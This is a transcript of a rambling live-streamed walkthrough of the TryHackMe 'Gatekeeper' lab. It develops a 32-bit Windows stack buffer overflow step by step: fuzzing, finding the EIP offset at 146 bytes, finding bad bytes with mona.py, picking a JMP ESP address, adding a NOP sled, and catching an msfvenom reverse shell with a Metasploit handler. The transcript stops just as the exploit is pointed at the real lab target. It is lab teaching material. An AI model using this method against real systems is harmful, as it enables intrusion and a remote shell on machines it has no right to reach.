Alright, and welcome. So, a little bit of technical difficulties there. I'm going to have to add in another window capture here because we are going to be using Windows and Linux tonight. So, let me get a new source in here and we'll window capture. We'll call this one Windows 10. So let me mess with this guy for like a second. Settings for Windows capture, Windows 10. You are going to be Windows 10 VM. There we go. Done. So now I should just be able to. So we got that Windows capture. We should have two now, right? Do we not have more than one now? Windows capture as source. I want to add another one as source. Oh, do we have two now? Alright, cool. Yes, we do. So we have two Windows captures now, I believe. So now all I have to do is just do that, bring it back down. Alright, cool. So there we go. And I'm wondering if I actually do something like this, does it show both of them? Oh man, we are in luck today. Look at that, huh? Alright, cool. So we're going to be doing some exploit to add song, intro song. You just want me to play guitar in the intro? And I'll start jamming out if you want. Come on, acoustic or electric? Alright, so we're going to do Try Hack Me Gatekeeper today. It's not actually looking like that. It's actually working anymore. It was working. I thought it was working. What we got here? Come on, Windows 10. You can do it. Come on now. You can do it, Windows 10. That just looks super weird now. Okay, so we're just gonna go ahead and actually just we'll just get this guy all the way big, and there we go. Alright, so we're gonna be doing Try Hack Me Gatekeeper today. We're going to start to work through this, and yeah, hopefully do start this guy off for exploit development September. So if you're watching this later on in another month, we did this all in September. If you're watching it on YouTube, it's probably come out a little bit later. Alright. So let's go ahead and grab that IP address first, and we'll start just like we do every other box. We're gonna nothing special here. We're gonna start with our nmap scan. All right, we're actually gonna use a Rust scan because I know that the port is super high on this guy, so we're actually gonna use a Rust scan. We're on nmap, or we're on Try Hack Me with Gatekeeper. All right, looks like we got some SMB stuff here. All right, let's go ahead and see what that's all about. And we have this super high port here. Let's go ahead and do an SMB client. All right, for him. See if we can actually do attack L here, because I'm not seeing any web open or anything like that, so hopefully there's something in here. And we do, we get a users. Let's go ahead and get into that guy under users there. See what we got here. Oh man, I don't even have a camera. I don't have anything up, do I? See what happens whenever everything starts failing all at once. Video capture device. Unless you guys don't want to see my face, I don't really care. Let me know in the chat. Does not bother me. I don't want to see my face, so if you guys don't, I definitely won't bother me at all. Alright, so yeah, let's go ahead and do a dir, and we got share here, so let's go ahead and cd into share, dir again, and we have this thing called gatekeeper.exe, then we have this port 31337, so let's go ahead and try netcat into that port 31337, and okay, we get a hello. What if I type in Ryan? Oh, Ryan, carrot. Alright, so it looks like whatever we put in here, it echoes back to us. Now, it's a .executable. So what you're going to want to do is you're going to want to bring that back down to you, so you're going to get it, right? Get that, okay? So I already did that. So CD in the desktop, buffer overflow September, Gatekeeper. If I do an ls-attack-la, you'll see I already got that gatekeeper.exe. Alright, I can try to do like a strings for it. Strings for gatekeeper.exe, maybe that'll work. Alright, we do. Okay, we got some strings here. Alright, let's we can look at the program, see how it's running stuff, or see, you know, what we can actually get with it or something. Port 31337. So we know that port goes along with that guy, like right there, once we get him and everything. So we know that he's doing something, right? It's definitely sending information back to us. It's copying whatever we put in, just adding a hello onto it. So now what we're going to try to figure out is this guy vulnerable? What if we send in too many characters? If you don't know what a buffer overflow is, I highly suggest you watch if you look up what is a buffer overflow on YouTube, let's see here. YouTube buffer overflow. Explain. This guy. Okay, right here. That's David, right? That's what his name is, right? This guy right here. The computer file. Yeah, if you look up him, he has a great explanation on what a buffer overflow, why they are done, what happens when you do them, and everything like that. And with memory, EIP, and all that good stuff. Okay. Now I did just say EIP, so if you know anything about buffer overflow, you should know that we are working on a 32-bit system. If I said RIP, we'd be working on a 64-bit system, which will come later on. There's no like prerequisites with this. There's nothing that you need to like understand beforehand, because I know buffer overflows, people are usually scared of them. Like, oh man, you know, I gotta do all this stuff. It's really not that hard. So we got that. So we went into there, right? We saw that. We went to SMB client. We could pull that back down. We pulled that back down to us. LSTAC ALA. We got our gatekeeper.exe. Now it's an executable, so we know it's Windows. How do we get that to a Windows machine? Well, any way we would get anything else to a Windows machine. Let's start up a Python server. We'll do an ifconfig. Now remember, Python, or my Windows machine, is not on the try-hack-me network, right? It's on my internal network, right? So let's go ahead and hop into my Windows machine here. Alright. And I should be able to get over to there, and once we're in here, let's go ahead and go to the IP address 10.98.160. Oh, there we go. 10.98.166, port 8888. Because I started up that Python server, right? Oh, that's 10.98. I still messed up, see? 192.168.0.21, port 8888, and there's my gatekeeper.exe. So what I gotta do now is click on him, and we can download him. Now, one thing I did notice, Windows 7 is getting much harder to find, and much harder to find on legit websites. How about that? So if you have a Windows 10 VM, this will work. However, you may have to download VRC runtime, and you may also have to start Immunity Debugger in run as administrator mode. Alright. So Immunity Debugger here, right? On the Discord, I showed, or I sent up to also have mona.py. I said just to follow the instructions for it. So if we go to here and we do a mona.py for Immunity Debugger, see it's the very first site for GitHub. Alright, we go ahead and for Windows, you're just going to hit download the zip file. Once you download that zip file, you then put mona.py into Immunity Debugger. So if we come to my files here, and I go to my C drive, right? Program files 86, Immunity Incorporated, Immunity Debugger, and then you go to py commands. You just take that mona.py file, you don't have to extract it, and you just drag and drop it right into here, and now you can utilize Mona Python commands. Alright, so that's how you do that. So Windows 7 VM, download it back to yourself with your own little web shell that you made, your little web server. Remember, it's not part of the try-hack-me network, so don't use a 10 address. It could be your 192 address. It could be an internal, right? network. And once you get it to yourself, we can go ahead and we can start this thing up in Immunity Debugger. So I already started up Immunity Debugger. Right-click, run as administrator. I'm going to go to File, Open, and then I'm just going to Gatekeeper. All right, that's what I want to open up. Okay. I noticed that I'd like to do this every single time. It's kind of weird, but that's just what happens. Sometimes you gotta kind of mess with it, and usually it comes back to like where it's supposed to. But right now it doesn't seem like it wants to, so hopefully it gets back to where it's supposed to. Virtual screen, resize 1920 by 1080. Let's try that. There we go. Alright, so usually I just minimize, open it back up, and it gets right where it's supposed to. So we can see over here. Right now we're looking at, if you don't see this, you can go to View, CPU, or just hit Alt-C. It'll bring up these 4 boxes that whenever you watch anyone do anything with Windows Windows stuff, that's usually what you see there. Alright, and yeah, we can start to look at what is happening, what are the binaries behind this guy, right? How is he talking to the CPU? What are they called? What are the jumps, the push, the return addresses, everything else? We can see it all inside of here. What else we can do with this is we can run and pause and terminate and add breakpoints as much as we want inside this guy. So as you can see, like right here, I just clicked around those guys. That's nothing. Don't worry. We have it's paused like right now, and you guys cannot see that because my face is in the way. which means we are about to drop my face off of this thing because this is much more important to know. So there's a pause down here in the right hand corner. If we hit F9 or we hit this big red button, or I think if we actually go to File, I think there's a way to do it up here also to make it run. Alright, yeah, debug run. Alright, you hit F9, the program is now running. Okay, so this program is running. It's running on the same port that it was on the other guy. So 31337, if you can see that like right there, I don't know. Let me go ahead and go to text. I think Unicode. Oh, that's not it. That's not it. That's ASCII 8 bytes. There's a way to be able to make it bigger, the text in here. Appearance, font 7. There we go. Okay, so you can see like right here, this 31337. That is the port that we're going to connect to, right? I know this is hard to see. I understand that. You know, I do understand. So that's why I'm going to try to talk as much through as possible, so you guys understand exactly what's going on inside of Unity Debugger. Okay. So let's go ahead and get back to our Kali Linux machine here, and let's start to see what we can do with this guy. Right. So there we go. So we sent off Gatekeeper. Cool. Go ahead and stop that. Clear him out. Clear this one out. And we can try to now netcat into that Windows machine, right? So let's go ahead. I'm just going to grab that Windows IP address like real quick. So it's .35. So I wonder if I can actually, can I copy it? Cool, I can. So let's go ahead and ping him first. Now he is Windows 10. Oh, he is being pinged. Alright, cool. I think I got my firewall down and everything. I turned everything off. So we can netcat now into there, into port 31337, which is what we saw was open. I hit A, and we get the same exact thing, right? Cool. Alright. So now let's start to try to break this program. That's the next step of this. Right? We want to see if we can send a certain amount of bytes at it, and does it crash? Okay. Once it crashes, that doesn't mean automatically that we can just, you know, do a buffer overflow. Doesn't mean that we can get a reverse shell back once it crashes. What we have to be able to do is, with every buffer overflow, is we have to be able to control the EIP, which you'll see here in a little bit. All right, but we have to be able to control that EIP value. So, very first thing, like I said, we want to do is we want to create some type of Python script or something like that we can send off, and we can send maybe, I don't know, 200 A's at it, see if it breaks. So let's go ahead and let's I already sent out a script and everything you guys can use. So let me go ahead and do a sublime text on that Gatekeeper exploit.py. So if you look at your script, you look at mine, it's going to look a little bit different because I didn't do this earlier to make sure the script worked. There was a couple things that I changed. So as you can see, I'm also importing sys, import socket. IP address is now like that. Port does not have anything on there. So we're going to do 192.168.0.35, right? Is that the IP address for him? Yep, .35, okay. So 192.168.0.35. That is my Windows IP address. I want to do everything locally with a buffer overflow because I want to get to where it works, then send it off. My port, 31337, right? I don't have a return address yet. We don't have any padding, and our payload is going to be A, and we'll say times 200. So we're going to send 200 A's off. So our buffer is going to be the return address plus the padding plus the payload. Now, like I said, we don't have that. We don't have the return address or the padding yet, so it's not going to do anything. All right, we're going to connect, okay, and we're going to see. Hopefully, we're going to see what happens. Control S to save in Sublime Text. It's an easy way to save. All right, and let's go ahead and let's send this off and let's see if we break the program. If it breaks at 200 bytes. Okay, so let's go ahead and do a Python Gatekeeper exploit.py, and that's going to be at, we'll hit enter, and we'll see, did we break that program? And if we come over here to our Windows machine, we can see that sure enough it says paused again. The program has broken. Okay, if I look up here, the EBP value is 41414141. Okay, we went way too far. The EIP is 4 ones. Alright, so it did break. 200 A's broke the program. We don't know where it broke at. We don't know anything about it yet, but we know it broke. Okay, so let's go ahead and start to try to figure out, well, where did we break that program? Why did we break that program? How many bytes did it take to break that program, right? So that's going to be our next step. How many bytes did it take to break that program? And there's a very simple way to do this. Let's go ahead and start this guy back up first. F3 to open up our prompt up there. Enter, yes, and then F9. And he'll start running again. And he does that again because he just hates me. He just doesn't like me. Some things just don't like me. 1920 by 1080. There we go. Okay. So he's running again, as we see down here. And what we're going to do now is we're going to create using MSF Venom, we are going to create a random byte array kind of thing. Alright, and then that will give us how many bytes, we can look at the offset from there. So we're going to type in MSF pattern. Nope. I'm trying to remember the exact command for it to type in. MSF tac pattern create. MSF pattern create. Alright, it's going to be 200 bytes long, right? So the length is going to be 200. Go ahead and enter, and now we got all these different bytes here, right? Go ahead and copy that. We'll go back to our Sublime text here, and we'll plug that in. So for our payload now, we're not going to do 8 times 200. We're just going to send this guy off. Alright, cool. Let's go ahead and send him off. Save. Send him off. And oh, he can't connect. Why not? Why can't you connect? Lies. You're running. Everything's good, right? Boom, boom, boom. Okay, yep, you're running everything. Do I have to restart you again? Just look at the other one right now, real quick. Okay, he's running. I'm just wondering why he's saying he can't actually do anything right now. Alright, so there we go. So I just restarted the program again, and it sent some stuff off, okay? So it sent off a bunch of stuff, right? And if I come back over to my program, it for sure has crashed again. We have another pause. Okay. However, as you can see now, we don't have all these A's there, right? We didn't have all those A's. We didn't send across all those A's. Right? So it's going to look different now. Okay, what we actually attacked it with and everything like that. The EIP is going to look different. Everything's going to look different now. But now, what we want to do is look at this EIP address. We want to see, okay, let's take that EIP address and figure out where did we actually crash at. So what byte did we actually crash at? So let's go ahead and right click, and we'll copy that selection to keyboard. We'll head back over to my Kali Linux machine. And then from there, we'll go ahead and do an MSF pattern, okay, offset, and first we have to tell our length because it has to know how long was it, right? Tac L 200, and then tac Q wherever the program crashed at. What was the EIP value? So our exact offset is 146. So at 146 bytes, this guy breaks. Well, I don't want to show my face this time because it blocks Windows, the Windows stuff. So I don't want to show my face or anything like that. I'm still talking with my hands because I'm Italian. But I want to show that because it blocks my the Windows machine, and I want you guys to have as much information as possible, at least the first couple times. Alright, so we're at 146 bytes, right? That's where we crashed at. Good. We know where the program crashed. So let's go ahead and immediately put that into here. We know it crashed at 146 bytes. So now what we can do is we can say A times 146 plus, we're going to throw in some B's in there. It doesn't matter if it's single or double quotes. Times 4. You'll see why it's 4. Plus, we're going to throw some C's into there. C times, we'll say 400. Okay. This is going to see, like, are we able to actually put something behind this, right? Are we able to actually put some type of exploit behind this? If the C's didn't show up, right, or if the C's, like, only like 20 of them showed up and then it went somewhere else, there's a jump happening somewhere. Something's happening to that program and it's not allowing all those C's to run. So that's like when we have to start looking at, like egg hunters and trying to put payloads in different areas and things like that. We do not have to do that this time, I promise. So we'll do a Control S, okay, and we'll go ahead and restart up that program again, right? Because we want to see, can we control the EIP value? That's what we're going to test like right now. Can we actually control the EIP? So let's go ahead and F3, enter, yes, F9. Man, this thing, every single time I do it, view, virtual screen, 1920 by 10. I wish can I lock it? Does anyone know if I can lock it? Like there, okay. So we have all these guys, right? And let's go ahead, he is running, supposedly, we'll see. Let's go ahead and see if we can send that off and what's going to happen when we do. Alright, so we'll go back to Kali here. So there's a lot of clicking back and forth on this guy. And we'll go ahead and we'll do a Python gatekeeper exploit.py. Alright, so he sent some stuff off, right? Let's go ahead and check out what happened. Okay, we'll get back over to Immunity Debugger here. And he's still running somehow. How you still running there, big guy? Huh, he is still running. Did I ever save that sublime text? Control S, A times 146 plus B. You know, we're going to do single quotes in here just in case. No, it shouldn't matter. Plus B plus C times 400. Save a lot. Save more than what I would ever need to. I'll go ahead and try to fire that off again. And did you work this time? For some reason, this program's not crashing. You know, let me go ahead and just rerun it again, because it has been acting weird today. And we'll see if it crashes it. And there we go. Okay, yep, there we go. So for some reason, I keep on having to run it twice for some reason. I don't know why that is, but I do. So I sent all those guys off, right? We'll go ahead and we'll make sure that you guys are even looking at the right thing here. Oh man, this computer's acting strange. Computer's acted super strange lately, and now it's like not even giving me like the chance to like do other things. Like I can't like click from one to another or anything like that. This guy is acting strange today. I'll tell you that much. There we go. Okay, cool. So we're back in Immunity, right? And why? Okay. There we go. Let me scroll up. And our EVP value is all 4 ones. That's fine. But our EIP is now 42424242, which is equal to 4 Bs. So we now have that equal to 4 Bs, right? Is that like a little bit easier? Let me see here. Let me try to find a bigger font here for you guys. Ooh, font 6. Okay. So as you can see, it's all 4 Bs like right there. That's what 42424242 is. That means that 146 bytes, sure enough, we controlled it. Okay. We sent that payload off, right? 146 bytes of A's. We sent those 4 Bs, and then we sent 400 Cs. Let's see what happened to those Cs. Let's see if they did anything. I look over at Immunity again. And as you can see, the C's are down there, and we have a bunch of C's. Good. That's good. That's good news for us, okay? Bunch of C's. All right, that's good news for us. That little guy right there, he's okay. Don't worry about that little guy. All right, so we have a bunch of C's in a row. So now we know, all right, cool. We can now control the EIP. We have some space to send in an exploit, and we should be good to go. Okay. So now the next part of this is actually starting to create an exploit. But first, we have to make sure that there's not any bad bytes. Bad bytes are anything that can stop a program, like X00. That's a bad byte. Okay. X0A is also a bad byte many times, a lot. X0A. Right, and so we're going to look at how do we find these bad bytes now, right? So that's going to be like there's a couple different ways to do this. Some people do it manually. Some people try to use Mona to do it. Okay, we're going to do both. However, earlier when I was doing this manually, it was giving me some weird stuff, and I didn't get that when I was using Ruby with this guy, but I got when I was using Python. So if you watch the first video on this in Ruby, you'll already know how to do the bad bytes, but Yeah, if you want to know manually, I'd rather do it manually, in all honesty, rather than try to use Mona. But I would definitely suggest you watch the first video on that. So what we're going to do, we're come in here, we're going to click on this little text box down here, a little white box down here, okay? And we can do a Mona, okay, byte array, I believe it is, like that. And it should be tac B, saying, hey, don't use these ones, /x00. Okay, notice which way the slash goes. That's actually a big deal. If you put the slash the wrong way, it will not actually run that command. We'll hit enter. As you can see, it made this cool little x01 all the way to x55. Alright, so let me go and go font 6, boom, x01 to xff. Did I say 55? To xff. So that's all the bytes that can be used, right? So let's go ahead, and can we just copy this whole thing, or how are we going to do this? Oh, yeah, we can actually copy, I believe it's byte array.bin. I think we can actually copy that. Alright, so we're going to try to copy byte array.bin now. Okay, so if we actually go to, I believe it would be inside of here, boom. Okay, we'll go to, so byte array.bin is, or byte array.text, everyone want to copy. Here is going to be in, it actually usually tells you where it's at. This one is not, that's okay. We'll go to C drive. I'm going to go with it's in Muty Debugger somewhere. Incorporate Muty Debugger. Is there a, so byte array. There we go. Okay, and there's all my bad bytes, or there's all my bytes that, you know, I can test. So we're going to take all these guys now, copy all them, right? Control C, and we'll go back over to my other terminal here, my Kali terminal. And in our payload now, because we know we control it already, right? So we can put a little, we'll do something like this and do a little offset equals 146. Okay. So now in our payload, what we can do is we can put all those bad bytes in. There we go. As you can see, I got rid of these single quotes, left the double quotes because this guy already came with double quotes on him. Okay. So we know what the offset's 146, right? We'll go ahead and just remember that for now. Now we need to test bad bytes. Okay. Now we may also need to actually send 146 bytes to add it, and then do the offset and all that good stuff. Okay, maybe do it a couple different ways here, but we're just trying to test out for bad bytes like right now. So let's just go ahead and see if we can send this off and what's going to happen. Press Control S a couple times. We'll stop that exploit. We'll make sure that he is actually back up and running over here. Mine is not. I know you can't see it like right now, but I'm just going to go ahead and restart him like real quick. I'm sure you guys got that down by now. Alright. If you don't, F3, enter F9, there you go. Should be up and running. Okay, and we're all back up and running over here. So I'm going to go ahead and fire him off again. And hopefully he set those bad bytes off. And we're about to find out. So it did not crash. I also don't know if it actually sent anything off. Let me go ahead and check this value first, like real quick, since it has been acting weird for me lately. It's been acting very weird actually for me lately. So let me go ahead and see if it actually even sent this off. And it doesn't look like it did. I'm going to restart the program again. Seems like whenever I go back into 1920 by 1080, like I have to like restart the program again. There we go. We'll just hit F9 there, and then we'll go ahead and fire that off. Fire that off again. And he seems to be sending these guys off, and nothing seems to be happening. Like right now. 1920 by 1080. Yeah, this one, it is acting weird for me. I had a lot of problems with what was it, the other thing today too, Streamlabs OBS. I had a lot of problems with that today too, which is super weird. I mean, I don't really have those problems really ever. Okay, so I don't know. That's a weird one for me. All right, so I think we actually need to put in the A times whatever still. I think we still need to do that, the offset and everything. Pretty sure we still need to do that. Don't 100% remember, but I'm pretty sure we do. So we're going to go ahead and try to throw that in like real quick, and we'll see what happens if we throw in the offset like real quick. So we'll just say, we'll just make a new thing, offset equals 146 or A times 146. Alright, and we'll do buffer equals should be offset plus return plus padding plus payload. Okay, we'll go ahead and control as that guy the whole time, and we'll send this guy off again. Alright, and he should just crash the program, and we'll see if we get those bad bytes coming through or not. I feel like I don't know if we actually will or not, but I hope we do. I don't think we're going to. Alright. I mean, we got some of them to come through, then we got a whole bunch of zeros after that. So, I'm going to try that one more time. Alright, we're going to get rid of that offset. So we'll go ahead and do that like right there. We'll go ahead and say, not just yet. Well, not just yet. Save that guy a whole bunch of times. Let me go ahead and start this back up again. F3, open, yes. F9. Alright, so now he should be up and running, okay? I know you guys can't see any of that, I do understand. Alright, we're going to send all that payload again with all those bad bytes, and we should get something in return there. Morning, how you doing, Murky? Alright, so let's go ahead and try this one more time, because it's being super, I mean, it's just being super weird today for some reason. Make me look stupid. No. Alright, we'll go ahead and send him off. Still says pawn, hopefully. He should 100% not be saying that. That's the thing. Because it's not even getting over to this guy for some reason. Like, oh, I think a muted debugger actually just crashed over here. Yes, it did. A muted debugger actually just crashed on my machine. So, let me go ahead and show you guys what's happening here. Let me get him big again. No, it didn't. Okay, we're good. Yeah, for some reason, it's not taking those bad bytes like right there for some reason. It should be, but it's not. And I'm trying to figure out why it's not taking those bad bytes like right now. We'll figure it out here in a second. I mean, we will get it. We will figure out those bad bytes. I know them, but I just don't want to say these are the bad bytes, you know, because that's not how it should be. That's not how you should do it. You guys should understand how to do it and everything like that. So, don't know why it's being so difficult with the bad bytes like right now. That's a new one for me. But we will figure out why it's acting like that, like right now. Because, okay, we sent the buffer over 146 bytes, right? We sent over, we got all that stuff. You know what? I'm just being an idiot like right now. That's why. I do have to do it. I'm being an idiot. That's all. So I do have to do the offset, and I also have to do plus the 4 B's. That's why. B times 4. Because I have to get back to right where I was before, right? We have to look at if there's any bad bytes in that part of the file system. Why I forgot about that, I don't know. But I mean, that's just how life is. You know, it happens, I guess. So yeah, we're going to try to get back to that part of the file system, and then from there, we should be able to see those bad bytes. Okay, so we have our 146 A's going across, right? Our 4 B's. Let me go ahead and make sure this guy's still up and running. He is. All right, so we have our everything ready to go. Let's go ahead and Control S that, and we will send that off again. Now he should crash. Now he should be able to go over the Windows machine. Let me make sure that actually worked. The thing is that it's only giving me so much here. That's the problem, really. I think I might actually have my stuff down below messed up. Like how we're actually setting it up, I think I might have that part messed up. I think I may have that part messed up. Right down here. So we got our port, that, our offset, right, 146 plus 4 Bs, our payload in there. Buffer is offset plus return, which you don't have, plus padding, which you don't have, plus payload. So offset and then payload. So that should technically work. Should. You know, let me get rid of this right here. Let me put him into return, because that's what we're doing. And he's going to be times 4. Right. We're going to do him times 4. We can just type in BBBB if we want to. And we have our payload here. You know, it might actually be getting lost with our payload here. Might be what the problem is, I'm wondering. Just throw in some brackets in there. So it might be getting lost with that. It might only be sending over the first part of the payload and not sending the rest of it. So that could be an issue also. We can also do a little enter, make it look pretty, right? John Hammond would be happy if we do that. See, that's what John Hammond would want. Alright, so let's go ahead and save that now. Let me go ahead and get back in the Windows machine. I'm just going to start that file back up again. Not doing anything crazy here. F9. Okay, so he started back up again. Go ahead and give him so he's actually the correct size again. And we will send that guy right back off again. We'll see what happens. Okay. So let's go ahead and send that back off again. Python Gatekeeper exploit.py. Whoa, yep, that is correct. I cannot have a plus sign there. Thank you very much. Good thing that guy's there, huh? Boom. Okay, and we will send him off again. And it's sending a bunch of crap across. And then we'll come over to our Windows machine. And let me go ahead and so then you guys can see this. Boom. Actually, I can do this like right here, huh? Boom. There we go. Making it fancy now. And now we have our ESP value as 0247194. Okay. Doesn't matter what it is, but we have our ESP there. We're going to follow that in the dump. Okay. So when we follow in dump, we can see that, you know, we got a bunch of A's here, whatever. Okay, X00 is bad bytes. We already said that, right? We don't want to send off X00, right? We have 1, 2, 3, 4, 5, 6, 7, 8, 9. Okay. 0A00. But right here, we have 21, 21, 21, 0A00, and then it breaks, right? So after 9 comes X0A. Alright. So I believe it does. Let's see. Let's see if that's what happens here. After 9, yep, X0A. So X0A seems to have broken it. And it seems to have made it so the exploit didn't work. So let's go ahead and get rid of that X0A. And see if we can do anything. So let's go ahead and get rid of that. We'll do X0A. We'll get rid of him. And let's try to send him off again. So if I go back to my regular guy here. There we go. As you can see in my regular guy over here, we have 789 X0B now because we got rid of X0A, right? Because that one kind of broke the system there, broke the file. And since it broke it, we have to obviously, you know, get rid of it. All right, that was bad bytes according to that program. Each program's bytes are different also. They're bad bytes. Okay. Get back over to Windows. All I'm going to do is just send it off from this this guy over here, or actually I'm going to start it up in Windows again first. So let's go ahead and start this machine back up. Yes. F9. Okay. Why it keeps doing that, I will never know. Until someone smarter than me tells me. Alright, so there we go. Okay, so we started the system back up right. I'm just going back over to my Kali machine like right now. I'm going to send off the exploit again, which it should break again. I mean, it should break it again. And it looks like it did. It paused again. Okay, let's go ahead and right click, follow and dump. Okay. Now we have 1, 2, 3, 4, 5, 6, 7, 8, 9, B, C, D, E, F, 10, 11, 12, and it just keeps going and going and going. You guys can look through every single one of these. I would highly suggest you look through every single one and try to find the bad bytes. Let's say this for a second right now. It does end on FF, and that is it. Okay. What you're looking for is anything that's out of place. Okay, so it might be like 9, 0B, 0C, 0, 0, 0E, 0F, 10, and you're like, whoa, wait, 0, 0. So those bad bytes can be hard to find. Alright, but you can see I set my A's, okay, boom, I set my B's, alright, and then I set all the bad bytes, right, or all the bytes. So X00 was bad and X0A was bad. You saw that whenever it hit X0A, it said, I think it said X0A, then it had a whole bunch of crap behind it. It messed up what was behind it. It was bad. You may also not have a whole bunch of crap behind it. It may not mess everything else up. That's something else you need to look at. Okay, so that's manually doing it. We can also utilize Mona, and we can compare the different two of them together. Okay, so we can do a Mona byte array, just like we did before, right? So we can do exclamation point, Mona byte array, tac B, and we're going to do X00, we know that was bad, and X0A, we think that that one's bad. We'll hit enter, it spits out this guy, saying, hey, X00 and X0A are gone. Alright, cool. And then what we can do from there is we can then look at it and do a compare. Okay, so we're going to compare the byte.bin that we just created with the stack address. Okay, so if we go back to here again, geez Louise, I got so many windows open like right now trying to figure out where the heck I am. Alright, so I need a stack address, so we need to get actually out of Mona like right now. Go away Mona, please. U, CPU thread, maximize U. Alright, I need a stack address. I think that's it, 025. Is that what I want, like right there? No, 00. I'm trying to remember exactly which one I want. I think I actually have to restart the program, grab it from there to actually get the one I actually want. Yeah, I'm pretty sure I have to actually restart the program. So we're going to do an F3, open, enter, F9. Okay, we should restart the program. You can tell because my virtual screen went insane. Alright. There. Okay. And whenever we have this program up and running, we want to be able to do a byte array and then look at the Mona compare tac F for it, right? I'm trying to remember, because I always do it by actually going through each one, so I'm trying to remember exactly where I even get that from, that byte array. So I feel like I just want to send it off again. I feel like it is the ESP. I really do feel like it is the ESP. You know what? I'm going to send it off again. We're going to do it again. I'm just sending off file like right now. You'll see it break down at the bottom. Down there, I really do feel like it's the ESP that I want to grab. I think it's copy this. Let's go ahead and copy this guy. We'll do a Mona byte array tac B. We'll do that, enter. And then we have to do a Mona compare tac F with the byte array. So we're going to do a Mona compare tac F. Okay. And then we're going to do byte array dot bin. Byte array dot bin. Alright. Then from here, we're going to put in that EIP address that we had. Tac A. Or excuse me, not the EIP address, but the EBP address that we had there. We'll hit enter. Alright. And as you can see, there are no bad characters left. Okay, so that's another way that you can do it. Alright, no bad characters. We're good. We are good. We have gotten rid of all the bad characters. Alright. So next up, what we're going to be doing is now we know what the bad characters are. We know where the offset's at. We just need really now a jump address, and we can start to, you know, like exploit this guy. So let's go ahead and get a jump address off of Mona. So we'll do exclamation point Mona JMP. Okay, so we're going to do a jump. You notice that it's still also paused like right now. It doesn't need to be up and running. Then we'll do a tac R ESP. Alright, because looking to return the ESP. Tac CPB. Okay, I do not know what that means. If anyone smarter than me wants to answer that, go for it. Okay, and our X00 X0A, right? Those are our bad bytes, okay? So we want to find something that we can jump to within the ESP address, and those are the bad bytes in there. So I hit enter, and we get absolutely nothing because it says that we suck, and we're looking at CPU thread. So here we go, okay? We got two different byte addresses. We got 0x04 blah blah blah, okay, C3. Let's go ahead and copy that. Okay, we can copy the clipboard, just the address. Alright, we'll go back over to my Kali machine, and you can grab either one. You can do either one with this, okay? Just so you know, with this one, like right here, you can. We'll go back to Sublime Text here, and what we're going to do is we are going to put that jump address. Let's first hit enter. Jump address. Alright. First thing we need to do is put them in a little endian format. And we are going to put that jump address into our payload there. Okay, we're going to put it into return. We don't want to return to 4Bs, right? That's not a thing. So what is little endian first off? Alright. So we need to pretty much reverse what it is below us. And I'll show you what that means here in a second, okay? We want to reverse what is below us, right? I know that kind of makes no sense like right now, but if we start off, we see the C3. So what if we do a /XC3? Okay, and that's going to be our very first thing, right? So we're going to do a /XC3 /X14 /X04 /X08. And we're doing this because it's written in little endian format. That's why we're doing this, like right here, okay? Oh, X08, there we go. We're doing this because it's written in little endian format. That's why we need to reverse it like that. Okay, I know that's weird. I know it doesn't make any sense like right now, but it's because it's in little endian format. Alright. So now let's go ahead and let's take a look at what we have so far. We have, okay. So we're going to take the buffer. Right, the buffer is going to equal the offset. Boom, A times 146. It's going to go to this returning address. Okay, we have padding. We don't have any yet. We're going to do that in a second. And then lastly, we have our payload. All right, that sounds pretty good. So for padding, what that is we are putting what's called a NOP sled. A NOP sled is to allow the exploit to slide down. All right, X90 is no operation. That's what that means. So we'll say, I don't know, 16 of these. Okay, we'll throw in 16. Hey, don't do anything. Just slide down into there, and that's going to allow, because once we run this program, bytes may shift like a little bit, so that's going to allow that our payload to actually be executed properly. And now what we need to do really is just create a payload. Okay, so to do that, we want to use MSF Venom. So we're going to use MSF Venom, TAC-P, Windows. Here, we'll get rid of all this stuff. This actually be, there we go, it's actually be TAC-F. We'll do it in C. Alright, we'll get rid of this. So we'll do TAC-P Windows. Alright, our L host is going to be, remember, it's the 192 address. That's the big thing. I have config. Alright, we have our 192 address right here. Right, that's going to be our L host. Our L port, whatever we decide to pick. Alright, TAC-B, what were our bad bytes? Right, we have to realize what was our bad bytes. We had X00, right, that was one of them. And X0A, right, that was another one. So we do TAC-B slash X00 slash X0A. Is that the right way? Slashes. That's like where I usually mess up at. Alright. It's going to be written in C format. That's what that means. Okay. Then we're going to say exit func equals thread. And what this is just a nicer way to not crash the program. Okay, we don't want the program to actually crash anymore. We want the program to continue running now. And if this payload doesn't work, or if we stop the payload, anything like that, this is a nicer way to say, hey, like, don't crash it. Just try to exit, you know, like a normal program would. So let's go ahead and hit enter on there. And you'll see why we use C here in a second, why we didn't use py for Python, even though it's a Python script. And this guy's taking a minute. It's because it already comes in how we want it to come. Okay, there we go. And now we should not also have X00, X08 anywhere in here, because we said, hey, those are bad bytes. So go ahead and grab this guy. We'll throw him up. Control V. Alright, we now have our payload. Okay, that payload is a reverse shell. So let's go ahead and utilize, go into MSF console, and let's utilize this, right? Let's see what we can do with this. MSF console will use exploit multi-handler. We'll set our L host to the 192 address, right? 192.168.0.21. Yep. We'll set our L port to 1337, and we'll go ahead and run him. Okay, so he's just going to sit there and wait. Oh, nope, we are not going to run him. We're going to set our payload to Windows, shell reverse TCP, right? Is that what I wanted? Shell reverse TCP. Yep. Enter. And we're going to click. We're going to type in run. Okay, so now he's running. He's ready to go. We got the payload in our payload area. We're going to look at the offset first. Okay, so our offset is A times 146. We're going to jump to the return, right? We're going to hit it with padding, X90, so 16, no operations. Then we're finally going to slam it with our payload. And hopefully what happens, hopefully, is we now get a reverse shell back. So, let's go ahead and get back into the Windows machine here. And we will see, does this actually work? Alright. Boom, we are back in Windows. And let me go ahead and do a file, or F3. Enter. We obviously have to have this guy up and running again, right? Boom, boom, boom. Oh, I thought he was going to make it that time. I thought he had it that time. I got excited. View, virtual screen, 1920 by 1080. I really going to have to figure out how to actually just keep it there so we don't have to do that every so time. That's going to get annoying. I'm annoyed and I'm doing the video. Alright, so there we go. Okay, we can get rid of all the stuff down here. Doesn't really matter if it's there or not. Alright, it's not doing anything. And we will go ahead and fire off the exploit. So let's try Python Gatekeeper exploit.py. We're going to be watching over here. We're going to enter. And it says you want I cannot connect. It hates me. Alright, let's go ahead and F3 again. Let's try running this program again because I think something might have messed up with that. I'm just going to hit F9 here. Right now it is running. I'm not going to go through that whole thing again. Alright. And we're just going to go ahead and try to see if we can fire out the exploit again. Alright, steady some crap. We had our shell up and running over here, and we get our reverse shell. Okay, who am I? Cool. Who am I / priv. Okay, cool. Now, this is great and all. On our local machine, we have now exploited, right? So let's just exploit it now on the Kali machine, right? IP address of 10.98.166. Okay. Bad bytes are still the same. Let's go 